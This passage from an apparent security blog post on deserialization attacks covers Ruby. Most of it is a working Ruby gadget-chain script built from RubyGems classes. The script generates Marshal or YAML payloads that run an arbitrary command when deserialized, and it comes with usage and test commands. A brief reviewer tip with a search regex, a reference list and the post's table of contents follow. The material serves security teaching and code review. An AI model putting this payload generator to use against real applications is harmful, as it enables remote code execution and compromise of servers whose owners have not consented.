            IO.popen(cmd_string, "r+") do |pipe|
                pipe.print payload
                pipe.close_write
                puts pipe.gets
                puts
            end
        end
    end
end

args = Parser.parse ARGV

if not args[:command] then
    abort("[-] Command required")
else
    command_length = args.command.length
    command = "|"+args.command+" 1>&2"
end

class Gem::StubSpecification
    def initialize; end
end

command_tag = "|echo " + "A" * (command_length-5) + " 1>&2"
stub_specification = Gem::StubSpecification.new
stub_specification.instance_variable_set(:@loaded_from, command_tag)

puts "[+] Building payload"
stub_specification.name rescue nil

class Gem::Source::SpecificFile
    def initialize; end
end

specific_file = Gem::Source::SpecificFile.new
specific_file.instance_variable_set(:@spec, stub_specification)

other_specific_file = Gem::Source::SpecificFile.new

specific_file <=> other_specific_file rescue nil

$dependency_list = Gem::DependencyList.new
$dependency_list.instance_variable_set(:@specs, [specific_file, other_specific_file])

$dependency_list.each{} rescue nil
dependency_list = $dependency_list

class Gem::Requirement
    def marshal_dump
        [$dependency_list]
    end
end

payload = Marshal.dump(Gem::Requirement.new)

type = (args.yaml ? "yaml" : "marshal")
if type == "yaml" then
    ext = ".yml"
    gem = Gem::Requirement.new
    gem.instance_variable_set(:@requirements, [dependency_list])
    payload = YAML.dump(gem)
else
    ext = ".raw"
    payload = Marshal.dump(Gem::Requirement.new)
end

payload = payload.gsub(command_tag,command)


if args[:save]
    payload_file = args[:save] + ext
    File.open(payload_file, 'w') { |file| file.write(payload) }
end

if args[:test] then
    puts "[+] Deserializing payload"
    Tester.test(type, payload, payload_file)
end

print args.encode
encode = ( args[:encode] ? args[:encode] : "") 

if encode == "hex" then
    puts "Payload (hex):"
    puts payload.unpack('H*')[0]
    puts
elsif encode == "base64"
    require 'base64'
    puts "Payload (base64):"
    puts Base64.encode64(payload)
    puts
else
    puts "Payload (raw):"
    puts payload
    puts
end

We can generate the YAML payload with:

 ruby serializer.rb -c "cmd /c calc" -y -s payload 

To test the payload, run:

ruby -e "require 'yaml'; YAML.load(File.read('payload.yml'))"

A calculator will spawn on the hosting system.

Tips for Source Code reviewers

To find this kind of vulnerability it is usually a good start to search the code for common regexes, like:

(Marshal.load|YAML.load)\s*\(

For each match, the code should be manually inspected to see whether the object being deserialized can be manipulated by an external attacker.

References

JAVA

Deserialization - ExploitDB
[OWASP London 2017] (https://www.owasp.org/images/a/a3/OWASP-London-2017-May-18-ApostolosGiannakidis-JavaDeserializationTalk.pdf)
Marshalsec
Deserialization Defence - LAOIS
Deserialization Cheatsheet
DeserLab

.NET

NodeJS

https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/

PHP

Python

Ruby

CyberSecurity Blog

Various Posts around Cyber Sec

Serialization: the big threat

Table of Contents

Serialization: What is it?

Deserialization: What I need to know?

Java

Java: Binary Archive Format

Generate payloads dynamically: Ysoserial

Java: Text-based Archive Format

Generate payloads dinamically: marshalsec

Tips for Source Code reviewers

.NET

.NET: Binary Archive Format

Generate payloads dinamically: ysoserial.net

.NET: Text-Based Archive Format

Tips for Source Code reviewers

PHP

Native Serialization Archive

PHP: Differences from JAVA and .NET

PHP: How to search for valid “gadgets”

PHP: PHAR Driven Deserialization

Generate payloads dynamically: PHPGGC

Tips for Source Code reviewers

Python

Python: Binary Archive Format

Python: Text-Based Archive Format

Generate payloads dynamically: deser-py

Tips for Source Code reviewers

NodeJS

NodeJS: Text-based archive format

Generate payloads dynamically: deser-node

Tips for Source Code reviewers

Ruby

Ruby: Binary Archive Format

Ruby: Text-Based archive format

Generate payloads dynamically: deser-ruby

Tips for Source Code reviewers

References